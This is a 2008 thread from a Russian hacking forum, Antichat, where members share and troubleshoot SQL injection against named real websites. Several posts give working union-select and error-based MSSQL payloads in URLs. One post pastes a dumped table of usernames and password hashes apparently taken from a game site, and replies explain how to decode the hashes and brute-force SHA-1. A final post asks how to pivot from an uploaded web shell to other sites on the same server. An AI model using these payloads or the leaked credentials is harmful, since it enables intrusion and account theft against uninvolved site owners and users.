HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 25.04.2008, 11:35
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
С нами: 10309346

Репутация: 4303


По умолчанию

гг, вот что действительно странно

Цитата:
Spyder (17:17:53 12/03/2008)
Warning: mssql_query() [function.mssql-query]: message: Line 1: Incorrect syntax near '\'. (severity 15) in /bigdisk/www/html/research/alcator/program/cmod_runs.php on line 119


Spyder (17:18:07 12/03/2008)
меня глючит или это мсскл на линухе?


ettee (17:19:30 12/03/2008)
ой,спудер...


ettee (17:19:32 12/03/2008)
ом


ettee (17:19:37 12/03/2008)
наебывают?


Spyder (17:19:40 12/03/2008)
я хз


Spyder (17:20:37 12/03/2008)
http://www.psfc.mit.edu/research/alcator/program/cmod_runs.php?run=1050525'
 
Ответить с цитированием

  #2  
Старый 25.04.2008, 11:40
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
С нами: 10309346

Репутация: 4303


По умолчанию

Цитата:
Сообщение от GrAmOzEkA  
это значит system отключено, юзай include
поржал)

Последний раз редактировалось Spyder; 25.04.2008 в 11:42..
 
Ответить с цитированием

  #3  
Старый 25.04.2008, 11:46
Macro
Постоянный
Регистрация: 11.11.2006
Сообщений: 595
С нами: 10261766

Репутация: 1079


По умолчанию

Spyder, mssql может быть удаленно расположенной бд
 
Ответить с цитированием

  #4  
Старый 25.04.2008, 11:53
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
С нами: 10309346

Репутация: 4303


По умолчанию

не подумал =)
 
Ответить с цитированием

  #5  
Старый 25.04.2008, 16:07
Велемир
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
С нами: 10470131

Репутация: 142


По умолчанию

Передал параметру одного из сайтов -1+union+select+1,2,3,4,5--

Выдало ошибку : Microsoft OLE DB Provider for SQL Server error '80040e07'

Operand type clash: ntext is incompatible with int

/news/index.asp, line 20

Кроме как cast в голову ничё не приходит. Читал, что взломать можно только сайты с ошибками 80040e14(*идеальная ошибка*).Неужели это так? ( Так мало сайтов тогда уязвимы чтоли Ж(


Предварительно подобрал количество полей.

Да и вот ещё что : попадает ли под красивый запрос такая хрень ? :

Warning: mssql_query(): message: Conversion failed when converting the nvarchar value '-1 order by 1000--' to data type int. (severity 16) in *какой-то путь к скрипту* on line 17


Вот ещё ошибка при выборе из бд -

Microsoft OLE DB Provider for SQL Server error '80040e07'

Syntax error converting the varchar value 'Òàê è æèâåì' to a column of data type int.

/index.asp, line 50

Как преобразовать нормально?)

Последний раз редактировалось Велемир; 25.04.2008 в 17:11..
 
Ответить с цитированием

  #6  
Старый 25.04.2008, 16:50
geforse
Постоянный
Регистрация: 02.03.2008
Сообщений: 893
С нами: 9574565

Репутация: 712


По умолчанию

Цитата:
Сообщение от Doom123  
Код:
https://www.lina2.ru/clans/index.php?showclan=-1+union+select+login,password+from+accounts/*
loginass

парль зашифрован

base64_encode(pack('H*'sha1($apss)))

Схема БД(спасибо Scipio):

Код:
http://www.lina2.ru/clans/index.php?showclan=-268520741+union+select+concat(table_schema,0x3a,ta  ble_name,0x3a,column_name),null+from+information_s  chema.columns+where+table_schema+like+0x6C3225/*
Код HTML:
11099	           PkdTSrZ22Jp9HBzYgkJ2yk8nEWI=
membel	 9Qu39+nMMEM3kwc1Pb4882N3kt8=
koliaxtx	O9yXyh2aY2gj2ExrnFhec93nGpE=
1401	           lCOPqkIxlJ637ZxppwwLZ0r5JUA=
15valera15	 4VQ2ikpjLNsxVM5jC5jNZD0Xr3o=
16valera16	 4VQ2ikpjLNsxVM5jC5jNZD0Xr3o=
19630812	 8I2BsLabPCh3DKL7U6z6dlRWfAM=
1lakosta1	 hMCldvvsnfyE7bUkzRAIY7ks5R4=
1niger1	 zSAcOz7JBqXyFEYnaa9qYyMgfQo=
2008	            /D9xitkeYMLqfvGQ9NBpaPBSAPU=
777	           /HpzTbpRjwMmCN/rBPTut58CWqc=
888	            6qZ/OpPQrLCNil6P+YZvUZg7PDs=
999	           r8l+oTH9fiaVqY7zQBNgj5fzTh0=
000	            iu+wbEJuB6CmcaHiSItIWNaUpzA=
Вот тут ЛОгин --- ПАСС

Теоритечески можно узнать пароли ?
 
Ответить с цитированием

  #7  
Старый 25.04.2008, 17:07
Doom123
Постоянный
Регистрация: 11.11.2006
Сообщений: 834
С нами: 10262314

Репутация: 668


По умолчанию

$a = base64_decode('iu+wbEJuB6CmcaHiSItIWNaUpzA=');
$b = unpack('H*',$a);
echo $b;

И нада брутить SHA-1 хэш
 
Ответить с цитированием

  #8  
Старый 25.04.2008, 17:44
Велемир
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
С нами: 10470131

Репутация: 142


По умолчанию

http://www.donland.ru/news.asp?Id=-1+union+select+top+1+cast(column_name+as+nvarchar) ,2,3,4,5,6,7,8,9,10+from+information_schema.column s--

Хули не выходит ((
 
Ответить с цитированием

  #9  
Старый 25.04.2008, 17:52
Ded MustD!e
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
С нами: 9851426

Репутация: 3908
По умолчанию

Цитата:
Сообщение от Велемир  
http://www.donland.ru/news.asp?Id=-1+union+select+top+1+cast(column_name+as+nvarchar) ,2,3,4,5,6,7,8,9,10+from+information_schema.column s--

Хули не выходит ((
Это MSSQL!!!

http://www.donland.ru/news.asp?Id=1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+I NFORMATION_SCHEMA.TABLES)--

https://forum.antichat.ru/thread30501.html
 
Ответить с цитированием

  #10  
Старый 25.04.2008, 17:49
SQL~In[J]ecTi0n
Познающий
Регистрация: 07.03.2008
Сообщений: 41
С нами: 9567101

Репутация: 17
По умолчанию

Вопрос: есть шелл на 1 сайте.На том же сервере есть еще 2 сайта.Как к ним получить доступ(при помощи уже залитого шелла)?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.